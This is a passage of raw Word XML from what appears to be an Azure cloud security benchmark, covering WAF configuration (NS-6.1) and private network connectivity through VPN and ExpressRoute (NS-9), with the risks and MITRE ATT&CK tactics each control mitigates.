    <w:p w14:paraId="19ED6AF5" w14:textId="73AD05BF" w:rsidR="00132074" w:rsidRPr="00193936" w:rsidRDefault="00132074" w:rsidP="00132074">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00132074">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DAF945" w14:textId="45FA1C95" w:rsidR="00132074" w:rsidRDefault="00433F6D" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00433F6D">
        <w:t>NS-6.1: Configure Azure WAF with appropriate rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A9478A" w14:textId="5B1E933D" w:rsidR="00F20CC8" w:rsidRDefault="00F20CC8" w:rsidP="002A0DC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F20CC8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enable web application firewall (WAF) capabilities in Azure Application Gateway, Azure Front Door, or Azure Content Delivery Network (CDN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C04A1E0" w14:textId="5F45AA75" w:rsidR="002A0DC0" w:rsidRDefault="002A0DC0" w:rsidP="002A0DC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0DC0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Select the appropriate WAF service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C50F9B6" w14:textId="4643702E" w:rsidR="002A0DC0" w:rsidRDefault="002A0DC0" w:rsidP="002A0DC0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0DC0">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Choose Azure Application Gateway for VNet-hosted applications, Azure Front Door for global edge delivery, or Azure CDN for content-heavy workloads based on application requirements and architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF37F6A" w14:textId="6564AC86" w:rsidR="00242356" w:rsidRDefault="00242356" w:rsidP="00242356">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242356">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Configure WAF policies with built-in and custom rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3213E47B" w14:textId="0B7D55AB" w:rsidR="00521DFF" w:rsidRDefault="00521DFF" w:rsidP="00521DFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00521DFF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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41D40E55" w14:textId="77777777" w:rsidR="00A75C93" w:rsidRPr="00A75C93" w:rsidRDefault="00A75C93" w:rsidP="00A75C93">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69BF45EE" w14:textId="616657E8" w:rsidR="00624774" w:rsidRDefault="00624774" w:rsidP="00624774">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00624774">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Set WAF policy mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FD3F00" w14:textId="1D12CB2B" w:rsidR="00A75C93" w:rsidRDefault="00A75C93" w:rsidP="00A75C93">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A75C93">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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27E688CF" w:rsidR="00A56365" w:rsidRDefault="00A56365" w:rsidP="00A56365">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Associate WAF policy with service endpoint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489A541" w14:textId="6314761C" w:rsidR="00A56365" w:rsidRDefault="00A56365" w:rsidP="00A56365">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A56365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Associate the WAF policy with the Application Gateway, Front Door, or CDN endpoint to ensure all HTTP/HTTPS traffic is routed through WAF for inspection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C51BE98" w14:textId="69AB3E11" w:rsidR="0099495A" w:rsidRDefault="0099495A" w:rsidP="00CA019C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2B3055" w14:textId="3F4EC6CB" w:rsidR="00DE1B90" w:rsidRPr="001072B1" w:rsidRDefault="00DE1B90" w:rsidP="00FB339D">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc236841626"/>
      <w:r w:rsidRPr="001072B1">
        <w:t>NS-9: Connect on-premises or cloud network privately</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="28EC7B00" w14:textId="5EF3CCC6" w:rsidR="00FF5F5B" w:rsidRDefault="00FF5F5B" w:rsidP="00FF5F5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5F5B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Security principl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09506982" w14:textId="55496984" w:rsidR="00FF5F5B" w:rsidRDefault="00FF5F5B" w:rsidP="00FF5F5B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5F5B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use private connections for secure communication between different networks, such as cloud service provider datacenters and on-premises infrastructure in a colocation environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B053BCD" w14:textId="09E0DB54" w:rsidR="00B63D66" w:rsidRDefault="00B63D66" w:rsidP="00B63D66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63D66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:r w:rsidRPr="00B63D66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>of mitigating</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547CC3B1" w14:textId="4D79BBC4" w:rsidR="00B63D66" w:rsidRDefault="00B63D66" w:rsidP="00951C3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B63D66">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Data interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4EAE1C" w14:textId="637A5DD4" w:rsidR="00951C3C" w:rsidRDefault="00951C3C" w:rsidP="00951C3C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00951C3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>When data travels over public networks like the internet, it passes through multiple routers, switches, and service providers, any of which could be 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5A3D07B7" w:rsidR="00951C3C" w:rsidRDefault="00951C3C" w:rsidP="000D5ADC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00951C3C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Man-in-the-Middle (MitM) Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9AF5CB" w14:textId="02161467" w:rsidR="000D5ADC" w:rsidRDefault="000D5ADC" w:rsidP="000D5ADC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5ADC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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5F3631F9" w:rsidR="000D5ADC" w:rsidRDefault="000D5ADC" w:rsidP="00883EC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D5ADC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0AD3C2" w14:textId="6390804D" w:rsidR="00883EC6" w:rsidRDefault="00883EC6" w:rsidP="00883EC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00883EC6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>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Default="00883EC6" w:rsidP="00883EC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00883EC6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3A0CEF" w14:textId="0BCE003F" w:rsidR="00883EC6" w:rsidRDefault="00883EC6" w:rsidP="00883EC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00883EC6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5498BF" w14:textId="6865585E" w:rsidR="001D0A0D" w:rsidRDefault="001D0A0D" w:rsidP="00883EC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D0A0D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6624D964" w14:textId="7AD80F3B" w:rsidR="001D0A0D" w:rsidRDefault="001D0A0D" w:rsidP="00883EC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D0A0D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4FF1AB" w14:textId="77777777" w:rsidR="001D0A0D" w:rsidRDefault="001D0A0D" w:rsidP="00883EC6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A2821A0" w14:textId="2D5892CD" w:rsidR="001D0A0D" w:rsidRDefault="001D0A0D" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001D0A0D">
        <w:t>NS-9.1: Use Azure virtual private network (VPN) for lightweight site-to-site or point-to-site connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2709A618" w14:textId="0B848ED5" w:rsidR="001D0A0D" w:rsidRDefault="001B587D" w:rsidP="001B587D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B587D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure virtual private network (VPN) to create secure, encrypted connections between on-premises sites or end-user devices and Azure virtual networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14724F48" w14:textId="77777777" w:rsidR="00206C93" w:rsidRPr="00206C93" w:rsidRDefault="00206C93" w:rsidP="00206C93">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="411C0B11" w14:textId="77777777" w:rsidR="001B587D" w:rsidRDefault="001B587D" w:rsidP="001B587D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="400FD18C" w14:textId="77777777" w:rsidR="001B587D" w:rsidRDefault="001B587D" w:rsidP="001B587D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766F8852" w14:textId="05F63607" w:rsidR="001B587D" w:rsidRDefault="001B587D" w:rsidP="00ED04A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B587D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy site-to-site VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BB03F" w14:textId="736EEB2F" w:rsidR="001B587D" w:rsidRDefault="001B587D" w:rsidP="001B587D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B587D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use site-to-site VPN to securely connect your on-premises network to Azure virtual network, enabling seamless communication between on-premises resources and Azure workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8A64A" w14:textId="0663C1B1" w:rsidR="00ED04A7" w:rsidRDefault="00ED04A7" w:rsidP="006A51E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED04A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Deploy point-to-site VPN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764A920B" w14:textId="3CF86625" w:rsidR="006A51E8" w:rsidRDefault="006A51E8" w:rsidP="006A51E8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A51E8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use point-to-site VPN to enable individual end-user devices (laptops, workstations) to securely connect to Azure virtual network from remote locations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748B8A0D" w14:textId="478BF161" w:rsidR="006A51E8" w:rsidRDefault="006A51E8" w:rsidP="00CB27F3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A51E8">
        <w:t>NS-9.2: Use Azure ExpressRoute (or Virtual WAN) for enterprise-level high performance connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F35F9E" w14:textId="5E3437C7" w:rsidR="00183C06" w:rsidRDefault="00183C06" w:rsidP="00183C06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00183C06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use Azure ExpressRoute or Azure Virtual WAN to establish private, high-performance, low-latency connections between Azure datacenters and on-premises infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAE273E" w14:textId="265B5875" w:rsidR="00183C06" w:rsidRDefault="00183C06" w:rsidP="00183C06">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:left="2520"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00183C06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
